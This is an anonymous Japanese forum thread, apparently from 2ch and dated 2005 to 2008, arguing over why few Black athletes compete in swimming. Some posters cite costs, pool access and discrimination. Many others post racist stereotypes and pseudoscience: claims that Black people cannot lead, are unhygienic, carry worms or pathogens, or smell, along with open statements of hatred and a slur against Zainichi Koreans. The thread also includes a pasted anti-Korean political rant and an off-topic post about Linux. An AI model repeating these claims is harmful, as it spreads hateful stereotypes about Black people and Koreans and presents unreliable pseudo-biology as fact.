0125名無しさん@お腹いっぱい。垢版2005/08/04(木) 08:37:25ID:EnriX+aY
水泳はヘナチョコ日本人でも勝てるマイナースポーツ。
単にやる奴が少ないだけ。
0126名無しさん@お腹いっぱい。垢版2005/08/04(木) 11:08:42ID:j7GnDVf2
123 あんたネット検索ってもっと社会に出て来いよ。恐い奴だ。ネットで書いてある事が世の中すべてじゃないぞ。学校の教員が言ってる事が正しいとも限らないけどな。
0127名無しさん@お腹いっぱい。垢版2005/08/04(木) 18:24:52ID:2vNqBCzh
私も学校の先生から、黒人は筋肉質な体形の為、脂肪が少ないから浮きにくい
っての言われた

けど、本当は差別ってのをみんな知ってた
思春期の子供に差別の事を言うのはよくないですよね
差別の事を告げると、将来万が一黒人と一緒に、プールなりお風呂に入った時白人と同じ差別をするからだよね
黄色人種であるながら、白色人種と思っている子供は日本には多数居るのが現実
0128名無しさん@お腹いっぱい。垢版2005/08/04(木) 20:20:03ID:e1cmakkj
差別だからというが、黒人が主な国はその説通用しないじゃん。
パウエルが水泳速そうには見えないぞ。
0129& ◆LMRaV4nJQQ 垢版2005/08/04(木) 23:31:37ID:owI04wfC

127は幼稚なガキで絶対人生で失敗します。そして
その話をしたプロ市民(=在日赤貧醜女)の思惑通り
せっかく全うな人生を送れるハズだったのに
外道を歩くことになると思います。

そうゆうことにならないように精一杯努力をしますが
そうゆう人間は仕方ありません。
0131名無しさん@お腹いっぱい。垢版2005/08/05(金) 06:00:47ID:T4vHrn9c
黒人の手記を昔新聞で読んだ
俺たちはプールで泳ぎたい
俺たちは泳げるんだ
しかし、プールに入れば皆が一斉に出て行く屈辱は耐えられない
0132名無しさん@お腹いっぱい。垢版2005/08/05(金) 10:12:21ID:7q8y/NhQ
泳ぎたきゃ泳げばいいじゃん。差別に負けてどうすんの?
泳げてもある一定のレベルにまで行けない理由があるんだよ!まだ分かんねぇの?
0133名無しさん@お腹いっぱい。垢版2005/08/05(金) 10:35:07ID:oKduLi4/
身体的な特徴のせいで黒人は泳げないとか本気で思ってる奴ってバカなの?
0134名無しさん@お腹いっぱい。垢版2005/08/05(金) 10:42:07ID:7q8y/NhQ
身体的な特徴で黒人が泳げないとか誰も思ってないと思いますがWトップスイマーにはなれないと思いますけど。差別等で世界水泳とかに出れる黒人選手がいないって本気で思ってる奴って相当なバカだなW
0135名無しさん@お腹いっぱい。垢版2005/08/05(金) 13:10:03ID:Wweegqlk
黒人の筋肉を調べると、
西アフリカの黒人は速筋の割合が多く、
東アフリカの黒人は遅筋の割合が多い。

西アフリカから連れて来られたアメリカ黒人は、短距離走などの
瞬発力を求める競技に適し、東アフリカのケニアやタンザニア黒人は
マラソンに適している。らしいのだが、

これって、何かのヒントになる?



0137名無しさん@お腹いっぱい。垢版2005/08/05(金) 14:17:46ID:NAETcjiN
国際水泳連盟(FINA)は、競泳規則を改正することを発表した。
人間本来の姿で泳ぐことを理想として
@水泳キャップの禁止。
A体を過剰に覆う水着は禁止。

の2つが新たに加えられた。
0138名無しさん@お腹いっぱい。垢版2005/08/05(金) 23:10:50ID:jmsG0RSq
黒人は頭が弱いから集団を率いる能力には欠ける。
兵隊として忠実に役割をこなすことはできる。

という考えのもと、アメフトの司令塔ポジションだけは白人が
務めることがいまだに多いんだよな。
そんな本音をポロッと言ってしまったESPNの白人解説者が
総スカンを喰ったこともあったし。
野球の監督も黒人が一定割合いないと差別的と見做される
って事で最近も揉めてるしね。
アメリカは現実として非白人大統領を未だ選出できない国。
黒人は泳ぎに向かないというのが事実か偏見かは別にして
差別なんかねーよとは簡単には言えんよ。
0139名無しさん@お腹いっぱい。垢版2005/08/06(土) 02:21:40ID:H8KKbKeq
138が言ってる意味が分からん。黒人差別がないとか誰も言ってないと思うけど。
0140名無しさん@お腹いっぱい。垢版2005/08/06(土) 02:51:48ID:Npb/KRXc
ゴルフに黒人選手が少ない理由はむろん経済環境もあるわけだが、
身体的な特徴もあるらしい。彼らの多くは猿腕で肘が真っ直ぐでない
ため、球が真っ直ぐいかないとか。
タイガーウッズは半分アジア系で猿腕ではないからね。
水泳にもおんなじような理由はあるかもしれんね。
0141名無しさん@お腹いっぱい。垢版2005/08/06(土) 03:12:27ID:kDCe5eLh
北島康介は逆膝だからより推進力が生まれやすいんだよ
0142名無しさん@お腹いっぱい。垢版2005/08/09(火) 15:58:48ID:t1FHx8Ez
ガトリンが水泳やったら最強だろうなw
0143名無しさん@お腹いっぱい。垢版2005/08/09(火) 21:13:02ID:nSeqbdAh
地方都市駅隣接スポーツクラブ
白人系の外国人は見かけますが、ブラック系もアジアンテイストの方も見ません。
いたら嫌ですけど。
0144名無しさん@お腹いっぱい。垢版2005/08/10(水) 12:24:26ID:aH/VwrCN
横須賀のプールにおいでよ
0145名無しさん@お腹いっぱい。垢版2005/08/10(水) 14:33:28ID:0bMYnuFa
泳いで速けりゃアメリカに金メダル持ってきてくれるんだぜ。
差別なんかしてる場合じゃないっしょ。
0146名無しさん@お腹いっぱい。垢版2005/08/10(水) 17:06:15ID:Q/mEi/y/
そういえばチャリンコ競技にも黒人が居ないな。
経済的理由に1票。
0147名無しさん@お腹いっぱい。垢版2005/08/10(水) 17:41:33ID:Qieik3W6
>>142
普通に水に浮けばね。その筋肉量の多さは水泳では逆に仇になる。
下手するとガトリンは溺れる。
0150名無しさん@お腹いっぱい。垢版2005/08/11(木) 14:42:01ID:C32TLoj9
カリームアブドルじゃバーが水泳やったら最強だろうなw
0151名無しさん@お腹いっぱい。垢版2005/08/13(土) 14:30:46ID:Ku8ibLM3
水泳に不向きだという根拠を示したソースはないの?
あればこんな議論は一発で答えがでるじゃん。

個人差を考慮する必要がないほど黒人は筋量が多く骨密度が高い。
筋量が多いこと又は骨密度が高いことは水泳では致命的欠陥である。

↑この二点を説明できれば不向き説が正しいとみんな納得出来るのでは。
みんな知っているとか常識とか言うのは無しで。
疑っている人は「俗説」ではないかと考えているんだろうから。
0152名無しさん@お腹いっぱい。垢版2005/08/15(月) 16:04:20ID:PxmKkLum
黒人の歯が、異様に白いと感じたことはないだろうか。
歯、そのものの大きさも大きくいかにも丈夫そうである。
一方、日本人の女性が多いような気もするが、まるで、乳歯のように短く、小さめという印象を受ける。
歯は、目に見える形の骨?と考えると骨の密度の違いも感じる。
0153名無しさん@お腹いっぱい。垢版2005/08/15(月) 16:08:39ID:PxmKkLum
9-10歳の子供たちの運動量と骨塩量を白人と黒人で比較してみた。
黒人の運動量はその1年の間に飛躍的に上昇したが、白人の方はそうでもなかった。
一方、同じ時期の白人は全身と背骨の骨塩量が急増しており、身長が著しく伸びていた。
更に黒人と違って運動量と全身、骨盤、背骨のミネラル摂取量の大きな相関関係が見られた。
それでも、体重などの数値を同じにして両者を比較すると、黒人の方が平均の骨盤の骨塩量が高かった。
要するに、白人の子供は良く運動し、良く栄養を取ればそれに見合った骨密度を得られる。
黒人の子供は運動量、ミネラル摂取量に余り左右されず、総じて高い骨密度を得られると言った感じ。
ソース
ttp://www.medicalnewstoday.com/medicalnews.php?newsid=22192

0154名無しさん@お腹いっぱい。垢版2005/08/15(月) 19:39:20ID:0G3zIFBV
元NBAのマイケル・ジョーダンがインタビューで言ってたんだが、3%とゆー体脂肪率の低さで体が水に浮かばないため、まったく泳げないらしい。
でも、特殊な例だよなこれは。
0155名無しさん@お腹いっぱい。垢版2005/08/15(月) 23:06:22ID:B8hT+9ci
俺は経済的な理由が大きいと思うなぁ。黒人にも裕福な人はいるし、それを
公平さの象徴として挙げる傾向もあるけど、平均的にはかなり差がある。

水泳は金を払ってクラブに所属しないと出来ないし、日本みたいに
都会に集中してないから送り迎えが出来る、あるいは他人にしてもらう
余裕がある家庭だけが参加出来る。そして比較的小さいころから泳いで
いた方が有利。(他のスポーツではそこらで普通に運動していてある程度
の年齢になったら発掘されたと言うのがあるが水泳では珍しい。)

後、role model の欠如もあると思う。やはり、子供があこがれるスポーツ
選手に黒人水泳選手は少ないから、スポーツできる子が他のスポーツに
流れやすい。

あと、黒人ばかりの国ではそうじゃないと言うけど、そういう国で水泳の
伝統がある国はないんじゃないかな。
0156名無しさん@お腹いっぱい。垢版2005/08/16(火) 11:14:31ID:C4xhtn7p
>>155
それは脳みその容量が小さいお前の馬鹿な想像でしかないな。経済的な理由な訳ないだろ。いい加減理解しなさい。
0158名無しさん@お腹いっぱい。垢版2005/08/16(火) 15:27:54ID:ToMR/HPj
経済的でやれないとしても、やってる人が皆無なわけではないでしょ?
やっぱり不向きってのはあると思うけど。
0159名無しさん@お腹いっぱい。垢版2005/08/16(火) 22:20:21ID:d3JUVGsQ
>>158
> 経済的でやれないとしても、やってる人が皆無なわけではないでしょ?

皆無ではないが,少ない.アメリカだと黒人全体で 1 割程度でさらに role
model 欠如+経済状況で黒人の水泳人口がさらに少ない.ちなみに黒人でも金
メダル取ってるよ.(アメリカでトレーニングした他国籍の人)

> やっぱり不向きってのはあると思うけど。

不向きであることがあり得ないという気はないが,経済的な理由や role model
の無さが大きくないという根拠はまだ見たこと無い.

ちなみにテニスは? その理屈だと, 黒人に不向きだという結論にならない?
Williams 姉妹が出て来た今はそう思ってる人が少ないような気がするが.
0160名無しさん@お腹いっぱい。垢版2005/08/16(火) 23:44:20ID:cvJf1nqD
例外的にオリンピックで優勝した例
88年ソウル五輪男子100Mバタ・Aネステイ(スリナム)
当時、金メダル確実のMビオンデイ(米国)を1/100秒差で破った。
0161名無しさん@お腹いっぱい。垢版2005/08/17(水) 01:22:32ID:FRzA8hqm
相撲に白人が少ないのは脚が長く腰高な体型が不向きであるから。
他に理由は無いね。

今の時代、相撲中継は世界中で見ることは可能だし、
マワシや土俵がなくても相撲をとることはできる。
環境なんて理由にならないよ。

日本人が外国人力士の参加を拒んでいるなんてこともない。
外国人だって半裸でサウナに入るじゃん。
つまり差別や風習の違いも全く理由にはならない。

横綱になれば年収一億円以上稼げるのだから、
体型さえむいていれば白人は相撲界を席巻しているはず。
実際そうではないのは、体型が向かないからであります!
0162名無しさん@お腹いっぱい。垢版2005/08/17(水) 01:43:33ID:vODSstAo
>>159
テニスの話をしてるんじゃなくて水泳について話してるんですが。
0163名無しさん@お腹いっぱい。垢版2005/08/17(水) 14:28:41ID:v7F3PkWg
日本では SLS+JE が結構出回ってたかな。

rebel code ちょっと読み直したけど、 MCC、 TAMU とかあったけど初めに
「全部揃った」distribution は SLS みたいね。MCC、 TAMU 位になるとなんか
聞いたことあるな…位の記憶しかない。



0165名無しさん@お腹いっぱい。垢版2005/08/17(水) 16:41:05ID:RelSMdjO
人の意見をあふぉ呼ばわりして見下す奴がこのスレには多いね
>>156,>>134,>>133,>>129,>>126
上の奴らよ、言いたい事あるなら医学書なり新聞過去50年分なりちょっとは調べてソース出してからモノ言えよ
こういう奴は自分があふぉでありながら、知識人のふりしてカッコ付けてるあふぉ
0167名無しさん@お腹いっぱい。垢版2005/08/27(土) 20:28:27ID:nRBOM3hO
(・∀・)このすれ興味あり
0168名無しさん@お腹いっぱい。垢版2005/08/28(日) 20:29:54ID:f3VXmr8f
アメリカではよほどの北で無い限り金持ちの家にはプールがあること多いです
子供の頃からプールになれて泳ぎ始めると言うパターン多し
黒人で自宅にプール作れる人は殆どいないでしょう

学校では水泳の事故が怖いので余りプールは作りません
おぼれるとすぐに訴えてきて億単位の賠償金払わされます
公共のプールでも同じで訴訟保険の高騰でどんどん閉鎖しています
高校レベルで初めて学校にプールが出来るか大学にしかない

結局スイミングクラブの会員になるしかない
その会員権高いです 会費も高い

面白いのがたまに黒人でも会員制のスポーツクラブでもいましたが
プールに入らず狂ったようにベンチしている香具師ばかりでした
0169名無しさん@お腹いっぱい。垢版2005/08/28(日) 22:01:29ID:AQU8WAfG
学歴差別者は痛い
0170名無しさん@お腹いっぱい。垢版2005/08/29(月) 00:52:14ID:n/1ARrwJ
俺は差別と黒人が大嫌いだ
0171名無しさん@お腹いっぱい。垢版2005/08/29(月) 01:19:05ID:1et+U9RT
>>161
なんかコピペかネタレスな気もするし、スレ違いだけど。。
マジレスすると単に「これまで相撲界に入門した白人が少ないから」だよ。
今何人か白人力士いるけど、みんな異常なほどのスピード出世だからね。
ブルガリアの琴欧州なんか入幕までのスピードが「歴代単独1位」(所要11場所)、
エストニアの把瑠都は新十両までが「歴代3位」だもんね。(歴代といっても年6場所制になった昭和30年代以降)
ま、みなレスリングや柔道で実績あるエリートなんだが。
露鵬なんかはレスリングで18歳のとき世界ジュニア選手権優勝だし。
ちなみに露鵬は新入幕までが歴代8位くらいだったかな。
みな足長いけど、相撲に順応できてる。
0172171垢版2005/08/29(月) 01:28:03ID:1et+U9RT
ついでに黒人について書くと、レスリングや柔道はあまり黒人が進出してないので
黒人は組み技競技は不向きって説があるが(ボクシングなど打撃系は強いが)、
相撲は瞬発力がモノをいう側面があるので、
ある意味短距離とも通ずるとこがありそうで、
昔の千代の富士みたいな「速攻相撲」で黒人にも向いてるんじゃないかと思う。
あまり長い相撲とか粘り強い相撲とか、投げ技とか、そういうのは向いてなさそうだが。
いままで黒人の血を引く力士って過去、戦闘竜ぐらいなんで、また出てきて欲しいな。
0175ST垢版2005/08/29(月) 16:22:19ID:ejk7YCPK
あと、黒人は足首が硬くカカトが出っ張ってるせいで、キックをうちずらいと
いう話を聞いた事がある。ってかいきなり話変えすぎだよみんな!!!
0176名無しさん@お腹いっぱい。垢版2005/08/30(火) 12:55:03ID:IHHdD8Sw
アメリカの黒人の話ばかりだけど、アフリカにはいっぱい泳げる人はいると思う。
っていうか絶対いる。ただその人たちが十分に練習する施設もコーチもないので
出てこられないのではないですか?うちのダンナが市民プールに行ってもそのせいで
出て行く人はいませんでした。
0177名無しさん@お腹いっぱい。垢版2005/09/02(金) 03:19:49ID:MSMa7UrK
>171
>161は「黒人は水泳に向かない」って頑なに主張する人を
皮肉ったネタレスでしょ。
あなた達はこう言ってるようなものですよって。

昔、アマ相撲でKONISHIKI並のデブ黒人を見た気がする。
けっこう強かったような。
 
0178名無しさん@お腹いっぱい。垢版2005/12/17(土) 13:08:39ID:dpp92NrV
>>34
>>もっとも肌の色で差別する人ってのは、学歴も、家柄もないドキュンが多いね。

白人優位主義者は学歴、家柄がある人間でも多い。非常に。
これは白色人種の性。
0180第1のコース!名無しくん垢版2006/02/19(日) 06:41:10ID:T6zyKNKM
スケートでも黒人金メダリストがでました。
水泳でも環境さえ整えばどうにでもなる気がしますけどね。
0181第1のコース!名無しくん垢版2006/02/19(日) 17:50:25ID:Z6dhL+bd
その“環境”って言うのが問題
ほとんどのちゃんとしたプールは会員制
例えば私の入っているたいしたことの無い会員制プール出さえ
入会金600ドル、月会費100ドル

レッスンも高いのよ
だから金のかからないバスケのようなようなスポーツに行く
公共のプール?おぼれたら大喜びで弁護士と組んで訴えるから怖くて作れない
0182第1のコース!名無しくん垢版2006/03/06(月) 23:08:14ID:jNidcHZt
>>181
アメリカの場合レッスン料の9割が損害賠償保険料だっていうぐらいだからねw
たいていボランティアとか公共の生涯学習みたいなのは「絶対に訴えません」
とサインさせられる。
まあ、アメリカの選手って黒人に限らず少ないのは環境のせいでしょ?
一部の金持ちが自宅の庭やホテルにある池のようなプールで水浴びするのが
せいぜいだもの。日本だと競泳用プールがあちこちに(各学校や各地域)ある
けど、アメリカだと滅多に見ない。(総合運動場のようなところだけ)
水泳は環境の整ってるアジアやオセアニアが圧倒的に優勢だね。
アフリカなんて飲み水の確保にすら困ってるんだからプールなんてもってのほか。
水と安全はタダなんて言われてるのは日本ぐらいだよほんと。
0183第1のコース!名無しくん垢版2006/04/11(火) 13:14:23ID:4w7p2ezJ
いちばんの理由は水泳のプロがあってお金が稼げる環境があれば黒人でも必ず優秀な選手が出てくるハズ
0184第1のコース!名無しくん垢版2006/04/11(火) 13:44:48ID:QDtsnaW+
黒人は水につかるとおっきしちゃうみたいだよ
0185第1のコース!名無しくん垢版2006/04/12(水) 01:16:36ID:gSTzhT/+
>>140
バカ?
0186第1のコース!名無しくん垢版2006/04/12(水) 01:21:55ID:m428+Amm
競泳パンツからナニがはみ出すからです。
0187第1のコース!名無しくん垢版2006/04/12(水) 17:05:12ID:3JToLLpn
何も弁護士と組んで訴えたいのは黒人だけでは
あるめい
0188第1のコース!名無しくん垢版2006/04/17(月) 11:54:25ID:EdQgmMUO
これは昔から疑問だった。
理由がいまだにわかならない。
他に黒人のほとんどしないスポーツはどう説明する?
フィギュアスケート・スキー・スノーボード・卓球・・・
0189第1のコース!名無しくん垢版2006/04/18(火) 15:00:21ID:uEvj4NTB
私は以前「プロ」が無いからと聞いたけど、実際はどうなんでしょうねえ。
0190第1のコース!名無しくん垢版2006/05/06(土) 04:02:21ID:gTXTIlBl
元々寒いのには弱そうだから、冷水温にが弱点なのではなかろうか?
高温水で競技させてみよう。
0191第1のコース!名無しくん垢版2006/05/14(日) 16:55:49ID:KVmeXwpy
みんな、気が付いていないだけだよ。

白人に見えてあれは全部元は黒人だったんだ。
長時間の過酷な練習で、脱色しちゃったんだよ、プールのカルキで。

だから彼らは強い。これ定説。
0192第1のコース!名無しくん垢版2006/05/19(金) 06:53:47ID:IqVYGwdf
いや、俺が新たに提唱する説は、こうだ。
もともと乾燥地帯で進化した黒人は、
水を大事にするようにDNAにプログラムされている。
飲み水でもないのに貴重な水を無駄にプールしていることが
無意識に不快感なんだよ。

米文化の日本人が、ご飯に箸を立たてられると
不快感を覚えるのと同じだ。
0193第1のコース!名無しくん垢版2006/06/06(火) 22:52:54ID:STY8iwyO
かなりスレ違いだとは思うんだけど、それらしい質問をするスレがここしか見当たらないので…。イスラエルとトルコの女性水泳athleteっていますか…?はいかいいえで結構なんで教えて下さい(__)
0194第1のコース!名無しくん垢版2006/06/06(火) 23:14:31ID:1PccQniB
>>191>>192
は正直コーヒー吹いたw
0195第1のコース!名無しくん垢版2006/06/07(水) 00:41:52ID:lA44oHlL
ttp://translate.google.com/translate?hl=ja&sl=en&u=http://www.blackathlete.com/artman/publish/cat_index_34.shtml&sa=X&oi=translate&resnum=4&ct=result&prev=/search%3Fq%3DBLACK%2BSWIMMER%26hl%3Dja%26lr%3D%26rls%3DGWYD,GWYD:2005-05,GWYD:ja
アメリカ系黒人の女性選手のインタビューだが 差別はやはり大きな要因としてあるようだ
あと アフリカの黒人についてはやはり、経済的理由(環境的理由)が大きいんじゃないか
プールの建設費・維持費がいくらかかるかは知らないが、グラウンドとは相当差があるだろう

海や川があるじゃないか、という意見もあるだろうが
波や水量、流速、コース(直進できるか、何mあるか)など、常時条件が一定ではない
そのようなところでトレーニングしてステップアップするのも限度があるだろう
日々科学的データに基づいた「1秒でも早い泳ぎ方」が研究されている現代じゃなおさら。
あと、温水プールのように通年泳げるわけでもないか

>>100の黒人自身の発言は気になりますね。
0197垢版2006/06/07(水) 11:25:45ID:VcAbyn5b
だからおまえ羅田舎もんにはわからないけど東京の SMSTには´Д…………
0199第1のコース!名無しくん垢版2006/09/11(月) 22:25:33ID:JmpcKnhx
パンパックの半フリ優勝した人黒人でしょ
0201第1のコース!名無しくん垢版2006/09/12(火) 13:06:57ID:pgW7Rno2
海外で水泳は貴族スポーツに近いものがある!日本だけだべ!みんなできるのは
0202第1のコース!名無しくん垢版2006/09/14(木) 21:14:37ID:FN+tBycl
アメリカのスポーツクラブは閉鎖的。
黒人どころか、女性も禁止のところが多い。
いまだにパンツをはかず、
真っ裸で泳ぐクラブもあるぐらい。
アメリカ人って本当に変だと思う。
0203フィンガール垢版2006/09/15(金) 08:03:33ID:YWRD6hQ6
少し前、パンパシで、黒人選手が優勝していた。素晴らしい事だと思った。もともとR&B、ヒップホップ好きなので、黒人の方に対する差別意識は全くない。もっと黒人選手が活躍してもいいのでは。
0204第1のコース!名無しくん垢版2006/10/03(火) 19:11:59ID:Juph0v77
正直言って黒人かっこよすぎ。
0205第1のコース!名無しくん垢版2006/10/05(木) 00:05:30ID:dzXLZ/Nw
202が本当なら男しかいないプール言って何が面白いんだ!

フィンガーるはお釜
0206第1のコース!名無しくん垢版2006/10/05(木) 02:21:05ID:gaYl94gJ
やっぱスピードとか
極小の水着じゃ収まりきらないからだろ
0207第1のコース!名無しくん垢版2006/12/30(土) 10:38:25ID:sa2b3IEc
底上げ
0208第1のコース!名無しくん垢版2007/01/17(水) 01:36:17ID:hxdexV8D
脂肪がつきにくい人種だから無理だよ
0209第1のコース!名無しくん垢版2007/01/17(水) 02:10:59ID:/U+HcPJI
赤道ギニア出身のエリック・ムサンバニがいるじゃん
0210第1のコース!名無しくん垢版2007/01/30(火) 04:21:51ID:AKJ+Fou/
溺れてた
0212第1のコース!名無しくん垢版2007/01/30(火) 06:47:13ID:fQf1lQsX
海パンに収まるサイズのチンポの持ち主が少ないからでは?
0213第1のコース!名無しくん垢版2007/01/30(火) 10:02:29ID:hcgPL2vj
実際、最新科学では1,2のどちらでもない。
0215第1のコース!名無しくん垢版2007/03/28(水) 12:13:09ID:K7tdX7uD
骨密度が高くて浮きにくいって既出?
0216第1のコース!名無しくん垢版2007/03/29(木) 10:45:17ID:uRrlMxc/
>>215
アフリカ大陸の人や、北米や中米南米の他人種との混血度が低い黒人の人は、
やはり水に浮きにくい体質のようです。
私の友人たちに聞いても、”いや、差別とかじゃなくて、ホント俺ら水に浮かないんだよ。。。。”
という返答が返ってきます。(彼らはジャマイカ系やカリブ海出身者で、体質的に西アフリカ本土の人間と殆ど変らない)。

ただ、可憐ジョーンズのような例もあるし、現在のアメリカの黒人については殆どの人が何パーセントかは、アングロ・サクソンやその他の白人、ネイティブ・アメリカン等との何世代にも渡る
混血を経て獲得した他人種の長所を兼ね備えているので、一概に体質の問題にするべきではないと思う。
0217第1のコース!名無しくん垢版2007/03/29(木) 11:38:45ID:CmdE1IpK
単にバスケや陸上にとられただけだろ
0219第1のコース!名無しくん垢版2007/03/29(木) 13:27:27ID:3ZWcqReE
漂白されて白くなっちゃうってマジで?
0222第1のコース!名無しくん垢版2007/03/29(木) 17:22:17ID:be0x99Ue
水泳は金がかかるんだろ。陸上ならかからないし。
0223第1のコース!名無しくん垢版2007/03/29(木) 18:33:56ID:yauYgvsw
プールのあるようなスポーツクラブ会費は高い、マシンだけなら安いクラブはあるが
自治体も金持ちが多いとプールを作れるが貧乏だとプール作るぐらいならシェルター作れと黒人が暴れる
学校にプールがあるのは私立校のみ

黒人にはゴルフと同じで水泳はムリポ
表では出ないが白人は黒人が来るとあからさまにいやな顔をするのが多いよ
ゲイバーでも白人用、黒人用とはっきり分かれていますから
0224第1のコース!名無しくん垢版2007/03/29(木) 22:02:44ID:iVCA+mBE
俺高校の時オリンピック水泳
代表チームの監督やる様な先生に
習ってたんだけどその人に
この話きいたんだけど忘れたw
岩崎がダメになった理由は覚えてんだけどな
0226第1のコース!名無しくん垢版2007/03/31(土) 13:55:44ID:8rHQguwW
そういえばボブサップも泳げなかったな。昔サップ人気絶頂の頃、zoneだかのアスリート紹介番組で特集してた。
化け物じみた肉体能力を示していたが、
プールでのトレーニングの場面でほとんどおぼれているのと変わらん状態だった。
なんでみんなみたいに泳げないんだ(´・ω・`)と嘆きながらも練習を続ける彼をつい応援してしまった。
ナレーションでは体脂肪率の低さを原因にしていたが、事実はどうだかわからんがね。
0227224垢版2007/04/06(金) 19:23:40ID:DlIyGdH4
アメリカ滞在時(合宿?)に飯食い過ぎで
太ってダメになったらしい
その先生曰わくよくあるパターンらしい
0228第1のコース!名無しくん垢版2007/05/01(火) 23:46:12ID:R4J59Zv9
此処まで読んだが、本題とは違うがアメリカの白人は基本的に泳げないのか?
日本人なら小中学校で水泳があるから70%位の奴は泳げるよな?
0229第1のコース!名無しくん垢版2007/05/02(水) 05:30:10ID:tw1kZHKM
高校になるとプールがある、それも半端じゃなく大きいのが
高校は日本で言うところの短大みたいなものだから
うちの出身校は温水の50メートルと25メートル(水球兼用)が有った

ただ一般の人が泳ぐというより体育会所属の選手が泳ぐもの
それ以外で体育の時間(PA)で水泳授業を選択した人間が使う
水泳は人気が無くて皆バスケットやサッカーを選択するけどね
だから基本的には海では遊べるが.....プールでは泳げない

By テキサス在住大学生
0230第1のコース!名無しくん垢版2007/05/02(水) 05:40:57ID:tw1kZHKM
ついでに言うと高校時代から水泳を始めたのでは遅い
選手クラスは皆水泳教室から始める
水泳教室はその高校のプールのレーンを時間で借りてレッスンする
バスケスクールはサッカースクール(月50-100ドル)に比べてレッスン料が高いのよ(月80-150)

金持ちの黒人の息子もたまにはいるが絶対数が少ない 
ただその少ないのが早い早い!!、筋肉の質が白人とは違う
奴隷時代に人間ユンボとしてでかい奴が連れてこられたその末裔だから
今、有望視されているジュニアは黒人の女の子たちだからその子が大きくなる頃には勢力図変わるかも

でも水泳は商売にしようにも食っていけないから....男子は没頭するには難しいかも
0231第1のコース!名無しくん垢版2007/05/02(水) 10:50:22ID:Bid68QD5
選手?

一般人は?
アメリカに行くとビーチも白黒混合ですか?
公営のプールで混合ですか?

黒人と白人が一緒になってプルーで遊ぶTVドラマみたことある?

まだまだ差別あるぞ
0232第1のコース!名無しくん垢版2007/05/02(水) 12:41:19ID:tw1kZHKM
地域によりけり

子供同士、黒人は黒人の子供と遊ぶし白人は白人の子供と遊ぶ
公営のプールは地域モザイクそのまま、黒人の多い地域は黒人、白人が多いとヒスパニック
ただしうちの周りは夏になるとシーズンカードを持った黒人の比率が高くなる
理由はエアコンが無いから....金が有っても黒人はエアコンには興味が無い

ビーチは黒人はあまり興味ないのか来ない
白人といっても泳ぐより陽に焼いているだけ、黒人はその必要は無い
意外とヒスパニックはビーチが好きなようで集団でたむろっている
0233第1のコース!名無しくん 垢版2007/05/12(土) 20:28:25ID:5UGuSJrn
以前インド人に水泳を教えようとしたが、体質なのか分からないが、どうしても
体が水に浮かないので断念した。
0234第1のコース!名無しくん垢版2007/07/08(日) 12:11:16ID:Fm1UWV/w
プールって全部水入れんのに相当お金かかるから
差別するわけじゃないけど先進国とかじゃないとなかなか
プールって用意できないんだと思うよ
中国とかもそうだよ 多分
0235すいすい垢版2007/07/08(日) 22:40:26ID:XyEeVHsc
差別に決まってんじゃん
0236第1のコース!名無しくん垢版2007/07/20(金) 13:37:02ID:Laj683DW
理不尽さがあるのは差別だが、
実際黒人の体臭きついし水に溶け込むと迷惑だからしょうがねー。
北米系の白人もけっこうくさいがな。
0237第1のコース!名無しくん垢版2007/09/28(金) 21:53:52ID:zoQvTFZo
ロシアのホテルのプールで。
朝から泳ごうとしてプールで泳いでいると
2、3人の女とその子供がプールサイドで待ってずっとこっちを見ていた。
空いていて気持ちが良かったのでそのまま1時間くらい泳いでいた。こういう差別ならサイコー。
0238第1のコース!名無しくん垢版2007/10/03(水) 10:36:24ID:jVQef8/b
宗教上の問題も大きいんでない?
だから日本人はあまりしがらみがない。
0239黒人が其処まで入ったらいけないだろう垢版2007/10/06(土) 16:43:35ID:ghvHF+pN
黒人がプールに入れば彼らは風呂も手も洗わない勿論尻も拭かないそんなものが
プールに入ってみろわれわれ先進国のものは總て死ぬ。
0240第1のコース!名無しくん垢版2007/10/06(土) 22:55:38ID:WgzdGA2k
黒人て衛生観がお粗末なんだってね。
未だ3割近くがギョウ虫を持っているらしい。
アフリカの奥地では未知の病原体の保菌者がいると聞く。
0242第1のコース!名無しくん垢版2007/10/08(月) 00:44:50ID:GyMKwAy6
>>239>>240
本当?
0243第1のコース!名無しくん垢版2008/01/19(土) 18:25:54ID:3QJ9b+F5
インテリ黒人がかっこよく見えるのは、そうではない黒人のことを下品だと
思ってるからかな?
なんか、俺はダメなヤツだ・・・。

バイクのモトクロス(アメリカでかなり人気)で、スチュアートっていう
黒人選手が強いらしいね。
カワサキ乗ってカッコイイ。
モトクロスは金がかかるから、お金持ちのボンボンだと思うけど。
0244第1のコース!名無しくん垢版2008/01/19(土) 19:18:59ID:t9w2I6mC
863 :名無しさん@八周年:2008/01/19(土) 18:53:04 ID:WSYGBjAaO
>>802
参院選で山口組の全国支部が民主党を支援していた事実、報捨てなどの報道番組を朝鮮人が制作している事実を一つ一つ教えていけば良いよ
よほどのバカでも無い限り何が起きているのか理解する
親なら本気で訴えればわかる
864 :名無しさん@八周年:2008/01/19(土) 18:53:35 ID:Pr+diFstO
ガソリン値下げを餌にひでーことしやがる。これは国民に対する裏切り行為。
868 :名無しさん@八周年:2008/01/19(土) 18:54:05 ID:pnQIx0/o0
>>864
ほいほい餌に釣られていく国民が頭が悪いとも言える


マスゴミの売国っぷりがマジでヤバイ件
なぜかニュースで自民を叩き民主の韓国推しをスルーしてる

【政治】 “韓国の李氏「自民が躊躇してる。民主党がリードして」” 民主、在日韓国人ら永住外国人の地方参政権付与法案、提出へ調整★2
http://mamono.2ch.net/test/read.cgi/newsplus/1200723094/l50
0245第1のコース!名無しくん垢版2008/01/19(土) 20:22:00ID:kDkl2FCn
ソウル五輪だかでアフリカのどっかの国から凄い下手な水泳選手が出て
話題になったよね。
0247第1のコース!名無しくん垢版2008/04/14(月) 16:00:46ID:zD+YQbAz
age
0250第1のコース!名無しくん垢版2008/08/11(月) 13:21:02ID:l97Ps6sF
米国男子フリーリレーチームに黒人がいたのが印象的
0253第1のコース!名無しくん垢版2008/08/11(月) 22:10:06ID:oqDQimw8
>>252
差別的な理由が大きいと思うよ。
シドニーのムサンバニの時の他の2選手のフライングが全てを物語ってる。
0256第1のコース!名無しくん垢版2008/08/15(金) 15:48:20ID:3/GYQvHd
体脂肪率説、浮力説は矛盾があるよ。

まずそもそも、「黒人」を一括りにして同じような身体傾向があるというのも乱暴な話だけど、
(「黒人」と言えば身長高いとかって先入観持ってる人いるけどとんでもない、世界でも指折りの低身長のグループもいるし、もちろん体脂肪率が高いグループもいる)
アメリカの黒人に限れば、特定の身体的特徴を持つグループが多い可能性はある。
(奴隷として連れてこられるときに選別されたり地域的な制約で、特定のグループに偏っていた可能性ね)

